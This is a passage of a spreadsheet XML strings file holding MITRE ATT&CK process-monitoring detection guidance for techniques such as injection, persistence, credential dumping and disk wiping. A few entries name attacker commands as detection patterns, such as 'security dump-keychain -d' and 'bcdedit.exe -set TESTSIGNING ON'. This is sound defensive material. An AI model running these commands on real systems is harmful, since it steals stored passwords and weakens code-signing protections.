    <t>Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.</t>
  </si>
  <si>
    <t>Monitor for executed processes that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.</t>
  </si>
  <si>
    <t>Monitor for processes that can be used to enumerate user accounts and groups such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes indicative of modifying account settings, such as those that modify `authorized_keys` or `/etc/ssh/sshd_config` files.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may achieve persistence by adding a Registry key to the Active Setup of the local machine.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly executed processes that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. </t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>Monitor newly executed processs for sdbinst.exe for potential indications of application shim abuse. 
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to get a listing of open application windows. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed processes and/or command-lines that aid in compression or encrypting data that is collected prior to exfiltration, such as 7-Zip, WinRAR, and WinZip.  </t>
  </si>
  <si>
    <t>Monitor for newly constructed processes with command-lines that create/modify or are executed from tasks. For example, on Windows tasks may spawn from `svchost.exe` or the Windows Task Scheduler `taskeng.exe` for older OS versions. (Citation: Twitter Leoloobeek Scheduled Task) Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed BITS tasks to enumerate using the BITSAdmin tool (bitsadmin /list /allusers /verbose). </t>
  </si>
  <si>
    <t>Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data to increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>Monitor newly constructed processes, e.g. browsers, for to gather personal information about users (ex: banking sites, interests, social media, etc.)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that could be used to abuse internet browser extensions to establish persistence. </t>
  </si>
  <si>
    <t>Monitor newly executed processes, such as &lt;code&gt;eventvwr.exe&lt;/code&gt; and &lt;code&gt;sdclt.exe&lt;/code&gt;, that may bypass UAC mechanisms to elevate process privileges on system.</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe
* Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Monitor for newly executed processes, such as setx.exe, that may abuse of the COR_PROFILER variable, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020)</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may establish persistence by executing malicious content triggered by a file type association.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes with arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined emails.</t>
  </si>
  <si>
    <t>Monitor created processes with arguments that may delete or alter malicious network configuration settings as well as generated artifacts that highlight network connection history on a host system -- which may include logs, files, or Registry values.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that may delete or alter generated artifacts associated with persistence on a host system. </t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to find cloud groups and permission settings.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system. Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that are associated with COM objects, especially those invoked by a user different than the one currently logged on.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.</t>
  </si>
  <si>
    <t>Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container as well as within the underlying host.</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe. Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly executed processes associated with account creation, such as net.exe </t>
  </si>
  <si>
    <t>New, benign system processes may be created during installation of new software.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>Monitor newly executed processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that executed through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor newly constructed processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes of binaries that could be involved in data destruction activity, such as SDelete.</t>
  </si>
  <si>
    <t>Monitor for newly constructed  processes and/or command-lines involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</t>
  </si>
  <si>
    <t>Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. Debugger related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may disable Windows event logging to limit data that can be leveraged for detections and audits.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes associated with DCOM activity, especially those invoked by a user different than the one currently logged on. Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also precede malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)</t>
  </si>
  <si>
    <t>Monitor for processes that can be used to enumerate domain accounts and groups, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Monitor newly executed processes associated with account creation, such as net.exe</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to find domain-level groups and permission settings.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging.</t>
  </si>
  <si>
    <t>Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, or evidence of Discovery.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes for unusual activity (e.g., a process that does not use the network begins to do so).</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes, such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001) , with arguments that can be used to enumerate email addresses and accounts.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).</t>
  </si>
  <si>
    <t>Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection. Detecting the use of environmental keying may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for process activity (such as unexpected processes spawning outside a container and/or on a host) that might indicate an attempt to escape from a privileged container to host. </t>
  </si>
  <si>
    <t>Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed processes to match an existing service executables. </t>
  </si>
  <si>
    <t>Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection. Detecting the use of guardrails may be difficult depending on the implementation.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes when removable media is mounted.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes when removable media is mounted </t>
  </si>
  <si>
    <t>Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for other behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser or Office processes.</t>
  </si>
  <si>
    <t>Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may exploit software vulnerabilities in an attempt to elevate privileges.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes </t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms.</t>
  </si>
  <si>
    <t>Monitor newly executed processes for actions that could be taken to add a new user and subsequently hide it from login screens.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may use hidden windows to conceal malicious activity from the plain sight of users.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that can be used instead of invoking cmd (i.e. pcalua.exe, winrs.exe, cscript/wscript.exe, hh.exe, or bash.exe)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes conducting malicious activity </t>
  </si>
  <si>
    <t>Monitor for processes, such as &lt;code&gt;certmgr.exe&lt;/code&gt; (macOS) or &lt;code&gt;certutil.exe&lt;/code&gt; (Windows), that can be used to install root certificates. A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through &lt;code&gt;authroot.stl&lt;/code&gt;. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity</t>
  </si>
  <si>
    <t>Monitor processes with arguments that may be related to abuse of installer packages, including malicious, likely elevated processes triggered by application installations.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that are associated with abuse of IPC mechanisms</t>
  </si>
  <si>
    <t>Monitor for executed processes (such as tracert or ping) that may check for Internet connectivity on compromised systems.</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts</t>
  </si>
  <si>
    <t>Monitor for newly created processes that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>Monitor processes spawned by command line utilities to manipulate keychains directly, such as &lt;code&gt;security&lt;/code&gt;, combined with arguments to collect passwords, such as &lt;code&gt;dump-keychain -d&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly constructed processes that assist in lateral tool transfers. </t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor for newly executed daemons that may abuse launchctl to execute commands or programs.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to find local system groups and permission settings.</t>
  </si>
  <si>
    <t>Monitor for processes and/or command-lines to install or modify login hooks, as well as processes spawned at user login by these hooks.</t>
  </si>
  <si>
    <t>Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior, such as establishing network connections.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that execute logon scripts</t>
  </si>
  <si>
    <t>Monitor processes for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.</t>
  </si>
  <si>
    <t>Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes and command-line arguments for actions that could be taken to change, conceal, and/or delete information in the Registry. (i.e. reg.exe, regedit.exe) </t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files.</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed processes and/or command line execution that can be used to remove network share connections via the net.exe process. </t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that can aid in sniffing network traffic to capture information about an environment, including authentication material passed over the network </t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may leverage Microsoft Office-based applications for persistence between startups. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook forms to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Microsoft Outlook rules to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that may abuse mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes for process executable paths that are named for partial directories.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes  for process executable paths that are named for partial directories.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may execute their own malicious payloads by hijacking vulnerable file path references.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines for actions that could be taken to gather system and network information. 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t>
  </si>
  <si>
    <t>Monitor for newly executed processes with arguments that can modify property list (plist) files.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.
Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to get information about running processes on a system.</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor newly executed processes that may abuse Python commands and scripts for execution.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that  execute /etc/rc.local if present.</t>
  </si>
  <si>
    <t>Consider monitoring processes for tscon.exe usage</t>
  </si>
  <si>
    <t>Monitor for newly executed processes executed from the Run/RunOnce registry keys through Windows EID 9707 or “Software\Microsoft\Windows\CurrentVersion\Run” and “Software\Microsoft\Windows\CurrentVersion\RunOnce” registry keys with the full command line.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators. [Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes (such as &lt;code&gt;mstsc.exe&lt;/code&gt;) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions that spawn additional processes as the logged-on user.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may take control of preexisting sessions with remote services to move laterally in an environment.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. The adversary may then perform actions that spawn additional processes as the logged-on user.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.</t>
  </si>
  <si>
    <t>Monitor for common cryptomining software process names that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Monitor newly executed processes associated with running a virtual instance, such as those launched from binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). For example, on macOS systems &lt;code&gt;log show --predicate 'process = "sshd"'&lt;/code&gt; can be used to review incoming SSH connection attempts for suspicious activity. The command &lt;code&gt;log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"'&lt;/code&gt; can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Monitor for suspicious processes modifying the authorized_keys or /etc/ssh/sshd_config files.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may hijack a legitimate user's SSH session to move laterally within an environment.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Windows safe mode to disable endpoint defenses.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that execute from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence by executing malicious content triggered by user inactivity.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may execute their own malicious payloads by hijacking the binaries used by services.</t>
  </si>
  <si>
    <t>Monitor suspicious programs execution through services. These processes may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may create or edit shortcuts to run a program during system boot or user login.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that does not correlate to known good software. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. </t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that execute during the boot up process to check for unusual or unknown applications and behavior</t>
  </si>
  <si>
